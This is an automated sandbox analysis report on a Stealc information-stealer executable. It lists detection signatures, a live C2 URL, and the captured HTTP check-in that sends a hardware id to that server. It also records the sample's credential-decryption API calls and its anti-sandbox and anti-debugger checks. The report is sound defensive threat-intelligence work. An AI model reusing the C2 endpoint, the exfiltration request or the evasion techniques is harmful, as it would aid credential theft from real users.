
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545099
MD5: 0d30eb6a4023a6dce770ce3d6388cb9b
SHA1: 83e8c18d4ad2b7c36d6699e7a9e25a7b552b9779
SHA256: 7ea542ed634733c045e8d30777ae4f1c9a0a87d532f336158d36887483a6af7c
Tags: exe, user-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3628 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0D30EB6A4023A6DCE770CE3D6388CB9B)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security

Source: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2062832423.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 3628 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 3628 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Source: 0.2.file.exe.f30000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Timestamp: 2024-10-30T05:24:04.560659+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 185.215.113.206 | Destination Port: 80 | Protocol: TCP

AV Detection

Source: file.exe Avira: detected
Source: 0.2.file.exe.f30000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: http://185.215.113.206/6c4adf523b719729.php/ Virustotal: Detection: 17%
Source: http://185.215.113.206/ Virustotal: Detection: 18%
Source: http://185.215.113.206 Virustotal: Detection: 18%
Source: http://185.215.113.206/6c4adf523b719729.php Virustotal: Detection: 16%
Source: file.exe Virustotal: Detection: 43%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3A2B0 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F372A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  POST /6c4adf523b719729.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
  Host: 185.215.113.206
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 39 39 44 44 31 30 46 31 33 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a
  Data Ascii:
    ------AFCAAEGDBKJJKECBKFHC
    Content-Disposition: form-data; name="hwid"

    899DD10F13543207603164
    ------AFCAAEGDBKJJKECBKFHC
    Content-Disposition: form-data; name="build"

    tale
    ------AFCAAEGDBKJJKECBKFHC--
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F362D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown HTTP traffic detected:
  POST /6c4adf523b719729.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----AFCAAEGDBKJJKECBKFHC
  Host: 185.215.113.206
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 39 39 44 44 31 30 46 31 33 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 41 41 45 47 44 42 4b 4a 4a 4b 45 43 42 4b 46 48 43 2d 2d 0d 0a
  Data Ascii:
    ------AFCAAEGDBKJJKECBKFHC
    Content-Disposition: form-data; name="hwid"

    899DD10F13543207603164
    ------AFCAAEGDBKJJKECBKFHC
    Content-Disposition: form-data; name="build"

    tale
    ------AFCAAEGDBKJJKECBKFHC--
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php6
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpv
Source: file.exe, 00000000.00000002.2113114519.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
Source: file.exe, 00000000.00000002.2113114519.00000000009E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/j
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206k
Source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F70098
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F8B198
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0133D047
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F62138
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013730D6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F74288
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F9E258
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013893F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01395206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FAD39E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0125E2AE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FBB308
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013025A4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138E47C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F9D5A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F745A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F54573
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F5E544
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012294E1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB96FD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0136D73B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F766C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FAA648
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012457F6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA6799
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_013936AF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F8D720
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012D56C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F9F8D6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F898B8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F8B8A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F84868
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_012BA841
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01272BA2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F98BD9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA4BA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA0B88
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01300D27
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FAAC28
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0131DC3A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F84DC8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F85DB9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F61D78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F8BD68
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F9AD38
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA1EE8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F78E78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138AF92
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138FFE3
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00F34610 appears 316 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: xpxnzipx ZLIB complexity 0.9946538036142771
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F43970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\WPDF5R83.htm
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2113114519.000000000096E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name, value FROM autofillX;
Source: file.exe Virustotal: Detection: 43%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe Static file information: File size 2145792 > 1048576
Source: file.exe Static PE information: Raw size of xpxnzipx is bigger than: 0x100000 < 0x1a0c00
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2062832423.0000000004CFB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.f30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xpxnzipx:EW;atgrbfaq:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x2166de should be: 0x21ab5b
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: xpxnzipx
Source: file.exe Static PE information: section name: atgrbfaq
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F5A0DC push eax; retf 0_2_00F5A0F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01290106 push ebp; mov dword ptr [esp], edx 0_2_01290120
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0139D16E push 7AE96079h; mov dword ptr [esp], ebp 0_2_0139D1AB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0139D16E push ecx; mov dword ptr [esp], 5B6F04D2h 0_2_0139D1F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0139D16E push ebx; mov dword ptr [esp], eax 0_2_0139D26C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0139D16E push 401DF8B4h; mov dword ptr [esp], ecx 0_2_0139D297
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0139D16E push 76E017CFh; mov dword ptr [esp], edx 0_2_0139D2B4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_014311DF push ebx; mov dword ptr [esp], ecx 0_2_01431201
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_01383182 push ecx; mov dword ptr [esp], ebp 0_2_013831D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push edx; mov dword ptr [esp], ebx 0_2_0138D1F5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], eax 0_2_0138D29C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 5C864357h; mov dword ptr [esp], edi 0_2_0138D316
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push eax; mov dword ptr [esp], ecx 0_2_0138D39B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], 12DDE9E3h 0_2_0138D3CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], ecx 0_2_0138D3E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], ebx 0_2_0138D400
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 3FDB9E17h; mov dword ptr [esp], edi 0_2_0138D495
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], eax 0_2_0138D4C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push eax; mov dword ptr [esp], ecx 0_2_0138D4CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push eax; mov dword ptr [esp], 20B28156h 0_2_0138D5A1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 5F8A0B30h; mov dword ptr [esp], ecx 0_2_0138D5B3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 03695830h; mov dword ptr [esp], ebp 0_2_0138D6B3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 6083226Ah; mov dword ptr [esp], ecx 0_2_0138D6FC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ebx; mov dword ptr [esp], 058DD1BCh 0_2_0138D732
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], edx 0_2_0138D753
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 13D5455Bh; mov dword ptr [esp], esp 0_2_0138D7EA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push edi; mov dword ptr [esp], edx 0_2_0138D872
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 1637974Fh; mov dword ptr [esp], edi 0_2_0138D8F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ebx; mov dword ptr [esp], ebp 0_2_0138D959
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push 4AD5F65Ah; mov dword ptr [esp], ebp 0_2_0138D9BE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0138D1F1 push ecx; mov dword ptr [esp], ebx 0_2_0138DAC0
Source: file.exe Static PE information: section name: xpxnzipx entropy: 7.952407047426657

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-37870
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
